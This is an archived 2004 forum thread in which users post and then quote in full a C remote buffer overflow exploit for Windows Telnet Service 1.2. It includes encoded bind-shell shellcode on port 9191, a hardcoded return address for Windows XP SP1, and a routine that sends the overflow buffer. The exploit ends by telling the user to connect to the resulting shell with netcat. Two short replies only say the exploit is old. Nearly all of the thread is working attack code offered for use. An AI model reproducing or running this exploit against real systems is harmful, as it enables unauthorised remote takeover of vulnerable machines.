Windows Telnet Service 1.2 Remote Buffer Overflow

Full Version: Windows Telnet Service 1.2 Remote Buffer Overflow

GovernmentSecurity.org > The Archives > Exploit Articles

BeNiNuK

May 6 2004, 09:27 PM

I was looking around my boards and saw this, not sure if its been posted before or if it is old but i thought i best post!!

QUOTE

/*
** Windows Telnet Service 1.2 Remote buffer owerflow
** by fiNis > fiNis[at]bk.ru
** for Win & Unix
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifdef WIN32
#include <winsock2.h>
#include <windows.h>
#pragma lib <ws2_32.lib>
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#define VER "0.0.1"

unsigned char shellcode[] = // bind shell at 9191 port (484 bytes)
"\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33"
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C"
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE"
"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB"
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77"
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77"
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77"
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77"
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77"
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77"
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77"
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77"
"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77"
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB"
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C"
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0"
"\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77"
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0"
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB"
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5"
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98"
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE"
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77"
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8"
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF"
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90"
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74"
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4"
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94"
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5"
"\xD3\x4A\x8C\x88";

long gimmeip(char *hostname);
void keepout();
/***************************************************************/
void keepout() {
#ifdef WIN32
WSACleanup();
#endif
exit(1);
}

void banner() {
printf("\nWindows Telnet Service 1.2(Jordan) remote buffer overflow");
printf("\n exploit by fiNis (fiNis[at]bk.ru), ver:%s\n",VER);
printf("-----------------------------------------------------------\n");
}

void usage(char *prog) {
banner();
printf("Usage: %s <target ip> [target port]\n", prog);
exit(1);
}

/***************************************************************/
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
keepout();
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}

int main(int argc, char *argv[]) {
int sock;
char expbuff[1024+500];
char recvbuff[512];
unsigned short tport = 23;
unsigned short port = 9191;
struct sockaddr_in target;
long retaddr = 0x77f9980f; // tested on WinXP (rus) + SP1
int len;

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif

if(argc < 2) usage(argv[0]);

if(argc > 2) tport = atoi(argv[2]);

printf("\n[+] Prepare exploit buffer");

memset(expbuff, 0, sizeof(expbuff));
memset(recvbuff, 0, sizeof(recvbuff));

memset(&expbuff, 0x41, 528);
memcpy(&expbuff[512], (unsigned char *) &retaddr, 4);
memcpy(&expbuff[528], shellcode, sizeof(shellcode)-1);

memset(&target,0x00,sizeof(target));
target.sin_family = AF_INET;
target.sin_addr.s_addr = gimmeip(argv[1]);
target.sin_port = htons(tport);

printf("\n[+] Initialize socket.");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("[x] Error socket. Exiting...\n");
keepout();
}

printf("\n[+] Try connecting to Telnet Server at %s:%hu...", argv[1], tport);
if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
perror("\n [x] Couldn't establish connection. Exiting...\n");
keepout();
}
printf(" - OK.");

//printf("\n Wait for response");
len = recv(sock, recvbuff, sizeof(recvbuff), 0);
if(len < 0) {
perror("\nError response server");
exit(1);
}

printf("\n[+] Sending diabolic buffer");
if(send(sock,expbuff,strlen(expbuff),0)==-1) {
printf("[-] Sending failed or filtred");
keepout();
}

//printf("\n[i]Wait for response");
len = recv(sock, recvbuff, sizeof(recvbuff), 0);
if(len < 0) {
perror("\nError recv");
exit(1);
}

printf("\n[+] Now try connect to shell on 9191 port (et:nc -vv target 9191)");

#ifdef WIN32
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif

return(0);
}

mortello

May 6 2004, 09:34 PM

QUOTE (BeNiNuK @ May 6 2004, 09:27 PM)

I was looking around my boards and saw this, not sure if its been posted before or if it is old but i thought i best post!!

QUOTE

/*
** Windows Telnet Service 1.2 Remote buffer owerflow
** by fiNis > fiNis[at]bk.ru
** for Win & Unix
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifdef WIN32
#include <winsock2.h>
#include <windows.h>
#pragma lib <ws2_32.lib>
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#define VER "0.0.1"

unsigned char shellcode[] = // bind shell at 9191 port (484 bytes)
   "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33"
   "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C"
   "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE"
   "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB"
   "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77"
   "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77"
   "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77"
   "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77"
   "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77"
   "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77"
   "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77"
   "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77"
   "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77"
   "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB"
   "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C"
   "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0"
   "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77"
   "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0"
   "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB"
   "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5"
   "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98"
   "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE"
   "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77"
   "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8"
   "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF"
   "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90"
   "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74"
   "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4"
   "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94"
   "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5"
   "\xD3\x4A\x8C\x88";

long gimmeip(char *hostname);
void keepout();
/***************************************************************/
void keepout() {
   #ifdef WIN32
WSACleanup();
   #endif
   exit(1);
}

void banner() {
   printf("\nWindows Telnet Service 1.2(Jordan) remote buffer overflow");
   printf("\n    exploit by fiNis (fiNis[at]bk.ru), ver:%s\n",VER);
   printf("-----------------------------------------------------------\n");
}

void usage(char *prog) {
   banner();
   printf("Usage: %s <target ip> [target port]\n", prog);
   exit(1);
}

/***************************************************************/
long gimmeip(char *hostname)
{
   struct hostent *he;
   long ipaddr;

   if ((ipaddr = inet_addr(hostname)) < 0)
   {
if ((he = gethostbyname(hostname)) == NULL)
{
   printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
   keepout();
}
memcpy(&ipaddr, he->h_addr, he->h_length);
   }
   return ipaddr;
}

int main(int argc, char *argv[]) {
int sock;
   char expbuff[1024+500];
   char recvbuff[512];
   unsigned short tport = 23;
   unsigned short port = 9191;
   struct sockaddr_in target;
   long retaddr = 0x77f9980f; // tested on WinXP (rus) + SP1
int   len;

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif

   if(argc < 2) usage(argv[0]);

if(argc > 2) tport = atoi(argv[2]);

   printf("\n[+] Prepare exploit buffer");

   memset(expbuff, 0, sizeof(expbuff));
   memset(recvbuff, 0, sizeof(recvbuff));

   memset(&expbuff, 0x41, 528);
   memcpy(&expbuff[512], (unsigned char *) &retaddr, 4);
   memcpy(&expbuff[528], shellcode, sizeof(shellcode)-1);

   memset(&target,0x00,sizeof(target));
   target.sin_family = AF_INET;
   target.sin_addr.s_addr = gimmeip(argv[1]);
target.sin_port = htons(tport);

   printf("\n[+] Initialize socket.");
   if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("[x] Error socket. Exiting...\n");
keepout();
   }

   printf("\n[+] Try connecting to Telnet Server at %s:%hu...", argv[1], tport);
if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
perror("\n [x] Couldn't establish connection. Exiting...\n");
keepout();
   }
   printf(" - OK.");

//printf("\n Wait for response");
len = recv(sock, recvbuff, sizeof(recvbuff), 0);
if(len < 0) {
perror("\nError response server");
exit(1);
}

   printf("\n[+] Sending diabolic buffer");
   if(send(sock,expbuff,strlen(expbuff),0)==-1) {
printf("[-] Sending failed or filtred");
keepout();
   }

//printf("\n[i]Wait for response");
len = recv(sock, recvbuff, sizeof(recvbuff), 0);
if(len < 0) {
perror("\nError recv");
exit(1);
}

   printf("\n[+] Now try connect to shell on 9191 port (et:nc -vv target 9191)");

   #ifdef WIN32
closesocket(sock);
WSACleanup();
   #else
close(sock);
   #endif

return(0);
}

This is an old one.....but thanks for posting it anyway

dissolutions

May 6 2004, 09:36 PM

July/01 Old